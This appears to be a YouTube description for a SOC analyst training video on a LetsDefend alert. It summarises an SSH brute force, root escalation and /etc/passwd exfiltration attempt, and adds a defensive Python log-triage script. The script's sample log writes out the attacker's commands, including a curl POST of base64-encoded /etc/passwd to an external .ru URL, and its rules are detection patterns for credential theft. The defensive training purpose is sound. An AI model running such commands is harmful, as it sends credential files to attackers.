Suspicious Base64 Commands SSH Brute Force, Root Escalation & /etc/passwd Exfil | LetsDefend SOC302
Day 115 of Becoming a SOC Analyst — SOC302 Suspicious Base64 Encoding/Decoding Commands Detected (True Positive)
An attacker at 89.187.185.184 brute-forced SSH on the Linux host Clark (172.16.20.43), successfully authenticated as the user analyst, and then escalated to root via sudo su. The attacker ran getent passwd for user reconnaissance, base64-encoded /etc/passwd to /root/Documents/encoded.dat to obfuscate the staged data, then attempted exfiltration with a curl POST to hxxp://ukr-net-files-loading-application.ru/upload. Firewall logs did not confirm a successful outbound transfer, but the staged file's contents were confirmed to be /etc/passwd: a credential-harvesting attempt. The endpoint was contained.
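As an added defender-side illustration (not code from the video or from the LetsDefend scenario), the following Python triage script scans constructed log lines for the stages described above and reports whether the full chain, from the brute-forced login through the staged /etc/passwd copy to the outbound POST, appears in order. The log format, the audit line layout and the failure threshold are assumptions; host, user, IP, path and URL follow the write-up.

```python
import re
from collections import defaultdict
# Constructed sample log (assumed format: sshd auth lines plus a generic cmd="..." audit line).
# Host, user, IP, path and URL follow the write-up above; the lines themselves are made up.
SAMPLE_LOG = """\
2026-05-07T03:41:02 clark sshd[1201]: Failed password for analyst from 89.187.185.184 port 51022 ssh2
2026-05-07T03:41:03 clark sshd[1201]: Failed password for analyst from 89.187.185.184 port 51023 ssh2
2026-05-07T03:41:05 clark sshd[1201]: Accepted password for analyst from 89.187.185.184 port 51031 ssh2
2026-05-07T03:42:10 clark cmd user=analyst cwd=/home/analyst cmd="sudo su"
2026-05-07T03:42:30 clark cmd user=root cwd=/root cmd="getent passwd"
2026-05-07T03:43:01 clark cmd user=root cwd=/root cmd="base64 /etc/passwd > /root/Documents/encoded.dat"
2026-05-07T03:44:15 clark cmd user=root cwd=/root cmd="curl -X POST -d @/root/Documents/encoded.dat http://ukr-net-files-loading-application.ru/upload"
"""
FAIL_THRESHOLD = 2  # failures from one IP before a success that we call brute force (assumed)
CHAIN = ["initial_access", "privilege_escalation", "recon", "staging", "exfil"]
COMMAND_RULES = [  # (stage, description, regex over the command string)
    ("privilege_escalation", "root shell via sudo", re.compile(r"^sudo\s+(su|-i|-s)\b")),
    ("recon", "account enumeration", re.compile(r"\bgetent\s+passwd\b|\bcat\s+/etc/passwd\b")),
    ("staging", "base64 encoding of /etc/passwd", re.compile(r"\bbase64\b.*/etc/passwd")),
    ("exfil", "curl POST of a local file", re.compile(r"\bcurl\b.*(-X\s*POST|--data|-d\s+@)")),
]
SSH_RE = re.compile(r"sshd\[\d+\]: (Failed|Accepted) password for (\S+) from (\S+)")
CMD_RE = re.compile(r'user=(\S+) .*cmd="([^"]*)"')

def analyze(log_text):
    """Return (stage, detail) findings in log order for the chain the write-up describes."""
    findings, failed = [], defaultdict(int)
    for line in log_text.splitlines():
        m = SSH_RE.search(line)
        if m:
            outcome, user, ip = m.groups()
            if outcome == "Failed":
                failed[ip] += 1
            elif failed[ip] >= FAIL_THRESHOLD:  # success right after repeated failures
                findings.append(("initial_access", f"{failed[ip]} failures then login as {user} from {ip}"))
            continue
        m = CMD_RE.search(line)
        if m:
            user, cmd = m.groups()
            findings.extend((stage, f"{desc} by {user}: {cmd}")
                            for stage, desc, rx in COMMAND_RULES if rx.search(cmd))
    return findings

def chain_complete(findings):
    """True when every CHAIN stage appears in order (staging followed by an exfil attempt)."""
    pos = 0
    for stage, _ in findings:
        if pos < len(CHAIN) and stage == CHAIN[pos]:
            pos += 1
    return pos == len(CHAIN)
```

A single hit on the staging rule is worth an alert on its own; the in-order chain check is what separates a contained attempt like this one from an isolated base64 invocation.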
🔬 Analysis Reports
🔍 AbuseIPDB (89.187.185.184) → https://www.abuseipdb.com/check/89.187.185.184?page=5
🦠 VirusTotal (exfil URL) → https://www.virustotal.com/gui/url/c78d42195e5a114d333d70812fc29d36425921fbb27d794b20327fb9fcfff08b/details
Scenario sourced from LetsDefend.io — one of the best hands-on SOC analyst training platforms out there.
Highly recommend if you're on the same path. I'm documenting every day of my journey to landing a Level 1 SOC Analyst role — the wins, the grinds, and everything in between.
00:00 Day 115 intro
00:25 Alert Details
01:27 Investigation
13:10 Playbook Answers
21:00 5w Log
24:45 Result
🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #Base64 #SSHBruteForce #PrivilegeEscalation #DataExfiltration #Linux #IncidentResponse #SIEM #Day115 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity
Video "Suspicious Base64 Commands SSH Brute Force, Root Escalation & /etc/passwd Exfil | LetsDefend SOC302" from the InkSec channel
Video information
7 May 2026, 3:45:00
Duration: 00:27:36